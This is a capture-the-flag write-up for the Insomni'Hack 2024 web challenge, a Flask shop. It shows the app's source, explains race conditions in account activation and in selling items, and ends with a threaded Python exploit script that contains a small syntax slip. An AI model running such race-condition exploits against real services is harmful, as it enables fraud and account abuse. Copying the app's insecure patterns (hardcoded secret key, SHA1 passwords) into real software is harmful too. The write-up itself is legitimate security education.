##                       ##

########           ########

############   ############

 ###########   ########### 

   #########   #########   

"@_    #####   #####    _@"

#######             #######

############   ############

############   ############

############   ############

######    "#   #"    ######

 #####               ##### 

  #####             #####  

    ####           ####    

       '####   ####'       

D
O

N
O
T

F
E
E
D

T
H
E

B
U
G
S

Inshopni'hack

[Insomni'Hack Finals, 2024]

category: web

by XSSKevin

Challenge

This challenge was a flask based webapp using redis and redis_om as temporary database storage.

import os
import uuid
import hashlib
import secrets
import time
from flask_wtf.csrf import CSRFProtect
from redis_om import Field, Migrator, JsonModel
from flask import Flask, request, render_template, make_response, redirect, flash
from typing import Optional
class Ruser(JsonModel):
    username: str=Field(index=True)
    password: str
    token: str=Field(index=True)
    balance: int
    isActivated: Optional[bool]
    challenge: Optional[str]
class RpurchaseLog(JsonModel):
    userId: str=Field(index=True)
    itemId: int
    price: int 
    description: str 
class Ritem(JsonModel):
    id: int=Field(index=True)
    name: str 
    price: int 
    description: str 
def initItem():
    for i in [
        {"id":1,"name": "Inso Flag", "price": 10, "description": "🏴‍☠️"},
        {"id":2,"name": "Swiss Flag", "price": 100, "description": "🇨🇭"},
        {"id":3,"name": "CTF Flag", "price": 1337, "description": os.environ.get("FLAG")}
    ]:
        Ritem(**i).save()
class API:
    @staticmethod
    def login(username, password, token) -> str:
        print("Register:   " + str(token), flush=True)
        if len(username) == 0:
            return ""
        rusers = Ruser.find(Ruser.username == username).all()
        if len(rusers) == 0:
            token = token or uuid.uuid4().hex
            token = str(token).strip()
            rusers = Ruser.find(Ruser.token == token).all()
            if len(rusers) > 0:
                return ""
            newUser = Ruser(username=username,password=hashlib.sha1(password.encode('utf-8')).hexdigest(),token=token,balance=20).save()
            try:
                rusers = Ruser.find(Ruser.token == token).all()
            except:
                return ""
            user = rusers[0]
            newUser.challenge = secrets.token_hex(32)
            newUser.isActivated = False
            newUser.save()
            Ruser.db().expire(newUser.key(),360)
            return token
        user = rusers[0]
        if (user.password != hashlib.sha1(password.encode('utf-8')).hexdigest()):
            return ""
        return user.token
    @staticmethod
    def getUser(token: str) -> (bool, int, [RpurchaseLog]):
        try:
            rusers = Ruser.find(Ruser.token == token).all()
            user = rusers[0]
        except:
            return False, 0, None
        rpurchases = RpurchaseLog.find(RpurchaseLog.userId == user.pk)
        return True, user.balance, [i for i in rpurchases]
    @staticmethod
    def buy(token: str, itemId: int) -> (bool, str):
        try:
            rusers = Ruser.find(Ruser.token == token).all()
            user = rusers[0]
        except:
            return False, "No existing user"
        try:
            Ritems = Ritem.find(Ritem.id == itemId).all()
            product=Ritems[0]
        except:
            return False, "No such item"
        if (not user.isActivated):
            return False, "User is not activated"
        if product.price > user.balance:
            return False, "Not enough $"
        newLog = RpurchaseLog(userId=user.pk,itemId=product.id,price=product.price,description=product.description).save() 
        RpurchaseLog.db().expire(newLog.key(),360)      
        user.balance -= product.price
        user.save()
        return True, ""
    @staticmethod
    def sell(token: str, purchaseId: int) -> (bool, str):
        try:
            rpurchasesLogs = RpurchaseLog.find(RpurchaseLog.pk == purchaseId).all()
            purchaseLog = rpurchasesLogs[0]
        except:
            return False, "No such purchase"
        try:
            rusers = Ruser.find(Ruser.token == token).all()
            user = rusers[0]
        except:
            return False, "No existing user"
        if purchaseLog.userId != user.pk:
            return False, "Not your purchase."
        RpurchaseLog.delete(purchaseLog.pk)    
        user.balance += purchaseLog.price
        user.save()  
        return True, ""
    @staticmethod
    def activate(token: str, challenge: str) -> (bool, str):
        print("Activation: " + str(token), flush=True)
        try:
            rusers = Ruser.find(Ruser.token == token).all()
            user = rusers[0]
        except:
            return False, "No existing user"
        if user.isActivated == True:
            return False, "User is already activated"
        if user.challenge != challenge:
            return False, "Wrong challenge submitted"
        user.isActivated = True
        user.save()
        return True, ""
app = Flask(__name__,static_folder='static')
app.secret_key = b'dev'
csrf = CSRFProtect(app)
try:
    Ritem.find(Ritem.id == 1).all()
except:
    initItem()
    pass
Migrator().run()
@app.route('/', methods=["GET", "POST"])
def default():
    if request.method == 'POST':
        token = API.login(request.form["username"], request.form["password"], request.authorization)
        if token:
            resp = make_response(redirect("/"))
            resp.set_cookie("auth", token)
            return resp
        else:
            return render_template('login.html',err_message="Wrong credential")
        pass
    else:
        token = request.cookies.get("auth")
        if token and len(token) > 31:
            is_login, balance, purchaseLog = API.getUser(token)
            if not is_login:
                resp = make_response(redirect("/"))
                resp.set_cookie("auth", "")
                return resp
            return render_template('home.html', balance=balance, purchaseLog=purchaseLog)
        return render_template('login.html')
@app.route('/buy/<itemId>', methods=["POST"])
def buy(itemId):
    token = request.cookies["auth"]
    is_success, err_message = API.buy(token, int(itemId))
    is_login, balance, purchaseLog = API.getUser(token)
    if not is_success:
        flash(err_message)
    return make_response(redirect("/"))
@app.route('/sell/<purchaseId>', methods=["POST"])
def sell(purchaseId):
    token = request.cookies["auth"]
    is_success, err_message = API.sell(token, purchaseId)
    if not is_success:
        flash(err_message)
    return make_response(redirect("/"))
@app.route('/activate/', methods=["POST"])
@csrf.exempt
def activate():
    token = request.cookies["auth"]
    data = request.get_json()
    is_success, err_message = API.activate(token, data['challenge'])
    if not is_success:
        return render_template('login.html',err_message=err_message)
    return make_response(redirect("/"))

Exploit

To get the flag we need to buy the item CTL Flag, priced with 1337 coins. The buy function can only be used when the account is activated. However, when registering we only have 20 coins and our account is deactiaved. So we need to somehow activate our account and increase our balance to at least 1337 coins.

Account Activation

We can activate our account with the activate function. We therefore need a token (which we can specify while registering) and a challenge value:

def activate(token: str, challenge: str) -> (bool, str):
    print("Activation: " + str(token), flush=True)
    try:
        rusers = Ruser.find(Ruser.token == token).all()
        user = rusers[0]
    except:
        return False, "No existing user"
    if user.isActivated == True:
        return False, "User is already activated"
    if user.challenge != challenge:
        return False, "Wrong challenge submitted"
    user.isActivated = True
    user.save()
    return True, ""

However, this requires us to know the challenge value of the user, who was randomly generated when creating the account.

def login(username, password, token) -> str:
    print("Register:   " + str(token), flush=True)
    if len(username) == 0:
        return ""
    rusers = Ruser.find(Ruser.username == username).all()
    if len(rusers) == 0:
        token = token or uuid.uuid4().hex
        token = str(token).strip()
        rusers = Ruser.find(Ruser.token == token).all()
        if len(rusers) > 0:
            return ""
        newUser = Ruser(username=username,password=hashlib.sha1(password.encode('utf-8')).hexdigest(),token=token,balance=20).save()
        try:
            rusers = Ruser.find(Ruser.token == token).all()
        except:
            return ""
        user = rusers[0]
        newUser.challenge = secrets.token_hex(32)
        newUser.isActivated = False
        newUser.save()
        Ruser.db().expire(newUser.key(),360)
        return token
    user = rusers[0]
    if (user.password != hashlib.sha1(password.encode('utf-8')).hexdigest()):
        return ""
    return user.token

This is a bit odd, as the user is created first and afterwards the challenge and activation value is set. This allows us, to exploit this functionality through a race condition:

newUser = Ruser(username=username,password=hashlib.sha1(password.encode('utf-8')).hexdigest(),token=token,balance=20).save()
try:
    rusers = Ruser.find(Ruser.token == token).all()
except:
    return ""
user = rusers[0]
newUser.challenge = secrets.token_hex(32)
newUser.isActivated = False
newUser.save()
def activate(token: str, challenge: str) -> (bool, str):
    print("Activation: " + str(token), flush=True)
    try:
        rusers = Ruser.find(Ruser.token == token).all()
        # Race Condition: newUser.save() needs to be called in the other request somewhen between now and ...
        user = rusers[0]
    except:
        return False, "No existing user"
    if user.isActivated == True:
        return False, "User is already activated"
    if user.challenge != challenge:
        return False, "Wrong challenge submitted"
    user.isActivated = True
    # Race Condition: ... now
    user.save()
    return True, ""

Hitting this race condition allows us, that we have stored the old challenge value in rusers. This time-frame is very small.

Exploiting sell function to increase balance

Let's have a closer look at the sell function:

def sell(token: str, purchaseId: int) -> (bool, str):
    try:
        rpurchasesLogs = RpurchaseLog.find(RpurchaseLog.pk == purchaseId).all()
        purchaseLog = rpurchasesLogs[0]
    except:
        return False, "No such purchase"
    try:
        rusers = Ruser.find(Ruser.token == token).all()
        user = rusers[0]
    except:
        return False, "No existing user"
    if purchaseLog.userId != user.pk:
        return False, "Not your purchase."
    RpurchaseLog.delete(purchaseLog.pk)    
    user.balance += purchaseLog.price
    user.save()  
    return True, ""

We have a similar situation as above.

  • First the purchaseLog is fetched from the database
  • Then we search for the user token
  • Then we delete the PurchaseLog from the database
  • Then we increase the balance

Here we can also exploit a race condition:

def sell(token: str, purchaseId: int) -> (bool, str):
    try:
        rpurchasesLogs = RpurchaseLog.find(RpurchaseLog.pk == purchaseId).all()
        # Race Condition: sell function needs to be called in another request somewhen between now and ...
        purchaseLog = rpurchasesLogs[0]
    except:
        return False, "No such purchase"
    try:
        rusers = Ruser.find(Ruser.token == token).all()
        user = rusers[0]
    except:
        return False, "No existing user"
    if purchaseLog.userId != user.pk:
        return False, "Not your purchase."
    # ... now
    RpurchaseLog.delete(purchaseLog.pk)    
    user.balance += purchaseLog.price
    user.save()  
    return True, ""

This allows us to run the function twice and increase our balance twice.

Exploit Script

import requests
import secrets
import base64
import re
import threading
import time
import json
# HOST = "http://localhost:1002/"
HOST = "https://inshopnihack.insomnihack.ch/"
def user():
    username = secrets.token_hex(8)
    password = secrets.token_hex(8) 
    token = "Bearer " + secrets.token_hex(32)
    print(f"u:{username},pw:{password},tk:{token}")
    return username, password, token
def activate(token, challenge = None):
    res = requests.post(HOST + "/activate/", json={
        "challenge": challenge
    }, cookies={
        "auth": token
    })
    r = res.content.decode()
    m = re.findall("alert alert-warning\">\n(.*)\n", r)
    if len(m) == 0:
        print("[+] User w/token " + token + " Activated")
        return True
    else:
        print("[+] " + m[0].strip())
        return False
sessions = {}
def createUser(username, password, token):
    print("[+] Creating user " + username)
    sess = requests.session()
    sessions[username] = sess
    res = sess.get(HOST + "/")
    data = res.content.decode()
    csrf_token = re.findall('csrf_token" value="(.*)"', data)[0]
    res = sess.post(HOST + "/", data={
        "username": username,
        "password": password,
        "csrf_token": csrf_token
    }, headers={
        "Authorization": token
    })
    m = re.findall("alert alert-warning\">\n(.*)\n", res.content.decode())
    if len(m) == 0:
        print("[+] Done creating user")
    else:
        print("[+] " + m[0].strip())
    return sess
username, password, token = user()
def hammerActivation(token):
     for _ in range(5):
        activate(token)
def get_csrf_token(sess):
    res = sess.get(HOST)
    print(res.content.decode())
def buy(sess, csrf_token, item):
    res = sess.post(HOST + f"/buy/{item}", data={
        "csrf_token": csrf_token
    })
    if res.status_code != 200:
        print(res.content.decode())
    return res.content.decode()
def sell(sess, csrf_token, item):
    res = sess.post(HOST + f"/sell/{item}", data={
        "csrf_token": csrf_token
    })
    if res.status_code != 200:
        print(res.content.decode())
    return res.content.decode()
def get_product_csrf_token_buy(sess, product):
    res = sess.get(HOST)
    m = re.findall(f'action="\/buy\/{product}.*\n.*csrf_token" value="(.*)"', res.content.decode())
    if len(m) > 0:
        return m[0]
    return None
def get_sell_product(sess):
    res = sess.get(HOST)
    m = re.findall(f'action="\/sell\/(.*?)".*\n.*csrf_token" value="(.*)"', res.content.decode())
    if len(m) > 0:
        return m
    return None
def get_amount(sess):
    res = sess.get(HOST)
    m = re.findall("You have (.*) bucks", res.content.decode())
    if len(m) > 0:
        print("[+] Amount: " + m[0])
        return int(m[0])
    return None
username, password, token = user()
is_activated = False
while not is_activated:
    username, password, token = user()
    ts = [threading.Thread(target=hammerActivation, args=[token]) for _ in range(5)]
    for t in ts:
        t.start()
    sess = createUser(username, password, token)
    for t in ts:
        t.join()
    buy(sess, get_product_csrf_token_buy(sess, 1), 1)
    is_activated = get_amount(sess) < 20
print("[*] Is Activated")
with open('cookie.txt', 'w') as f:
    json.dump(requests.utils.dict_from_cookiejar(sess.cookies), f)
sess = requests.session()
with open('cookie.txt', 'r') as f:
    cookies = requests.utils.cookiejar_from_dict(json.load(f))
    sess.cookies.update(cookies)
while True:
    get_amount(sess)
    print("[*] Buying")
    while True:
        amount = get_amount(sess)
        product = 1 if amount < 200 else 2
        if (amount == 0 and product == 1) or (amount < 100 and product = 2):
            break
        buy(sess, get_product_csrf_token_buy(sess, product), product)
    tds = []
    for el in get_sell_product(sess):
        if not el:
            continue
        sellId = el[0]
        csrf = el[1]
        for i in range(20):
            tds.append(threading.Thread(target=sell, args=[sess, csrf, sellId]))
    for td in tds:
        td.start()
    for td in tds:
        td.join()
        
    get_amount(sess)

Some notes:

  • In order to retrieve the flag use the cookie.txt file and set the cookie manual in the browser
  • Then you can buy the CTF Flag item
/writeups/ $

$